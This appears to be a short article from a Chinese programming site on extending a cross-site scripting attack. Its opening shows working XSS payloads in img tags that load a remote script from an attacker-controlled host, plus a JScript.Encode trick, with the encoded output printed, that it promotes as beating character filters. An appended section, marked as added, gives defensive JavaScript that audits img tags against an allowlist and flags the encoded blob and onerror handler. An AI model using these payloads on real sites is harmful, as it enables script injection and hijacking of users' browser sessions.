How to Inject More JS from Inside an XSS
程序员文章站
2022-03-16 16:44:23
<img src="javascript:try{var s=document.createElement('script');s.src='http://xss/xss.js';document.body.appendChild(s);}catch(e){}"></img>
What if characters are filtered? Once the payload is encoded with JScript.Encode, it is unbeatable~
Before encoding:
<img src='#' xss="try{var s=document.createElement('script');s.src='http://xss/xss.js';document.body.appendChild(s);}catch(e){}" onerror="execScript(decodeURI(this.xss),'JScript.Encode');" >
After encoding:
<img src='#' xss="#@~^bqaaaa==omx`7lmp/{nk^es uycm.nmy as s xdcv/1dbwobbikrdd1xb4yo2=zzpjuzp?u n/vpnkmes or(w[xcl22xn;4k^n`kbi81ldm4`nbp8xccaaa==^#~@ " onerror="execScript(decodeURI(this.xss),'JScript.Encode');" >
Hehe~ Exciting, right~ How to use it beyond this is for you to experiment with. For it to work properly, the Encode output also has to be passed through encodeURI once.
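Why the encoded form gets past a character filter, and what still catches it, as an added example that is not part of the original article: a keyword filter is compared with a structural allowlist audit of the tag. The function names, the allowlists and the sample tags are assumptions made for this example, and the encoded blob is a constructed placeholder.

```javascript
// Added example: structural allowlist audit for <img> tags (defensive check).
const ALLOWED_ATTRS = new Set(['src', 'alt', 'title', 'width', 'height']);
const ALLOWED_SCHEMES = new Set(['http', 'https']);
const ENCODER_MARKER = /#@~\^/; // leading marker of Script Encoder output

// What a character/keyword filter does: look for known-bad strings.
function keywordFilterBlocks(tag) {
  return /javascript:|createElement|appendChild|<script/i.test(tag);
}

// Split one tag into {name, value} pairs: name="v", name='v', name=v or bare name.
function parseAttrs(tag) {
  const body = tag.replace(/^<\s*[a-z0-9]+/i, '').replace(/\/?>\s*$/, '');
  const re = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  const attrs = [];
  let m;
  while ((m = re.exec(body)) !== null) {
    attrs.push({ name: m[1].toLowerCase(), value: m[2] ?? m[3] ?? m[4] ?? '' });
  }
  return attrs;
}

// Report everything that is not on the allowlist, whatever the value looks like.
function auditImgTag(tag) {
  const findings = [];
  for (const { name, value } of parseAttrs(tag)) {
    if (name.startsWith('on')) findings.push(`event-handler:${name}`);
    else if (!ALLOWED_ATTRS.has(name)) findings.push(`unknown-attr:${name}`);
    if (name === 'src') {
      // Browsers ignore whitespace and control characters inside a scheme.
      const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(value.replace(/[\s\x00-\x1f]/g, ''));
      if (scheme && !ALLOWED_SCHEMES.has(scheme[1].toLowerCase())) {
        findings.push(`scheme:${scheme[1].toLowerCase()}`);
      }
    }
    if (ENCODER_MARKER.test(value)) findings.push(`script-encoder-blob:${name}`);
  }
  return findings;
}

// Constructed samples shaped like the article's tags; the blob is a placeholder.
const SAMPLES = {
  scheme: `<img src="javascript:try{}catch(e){}">`,
  clear: `<img src='#' xss="try{document.createElement('script')}catch(e){}" onerror="execScript(decodeURI(this.xss),'JScript.Encode');">`,
  encoded: `<img src='#' xss="#@~^PLACEHOLDER==^#~@" onerror="execScript(decodeURI(this.xss),'JScript.Encode');">`,
};
for (const [k, tag] of Object.entries(SAMPLES)) {
  console.log(k, keywordFilterBlocks(tag), auditImgTag(tag));
}
```

The keyword filter passes the encoded tag, while the audit still reports the `onerror` handler and the non-standard `xss` attribute, neither of which depends on what the value contains.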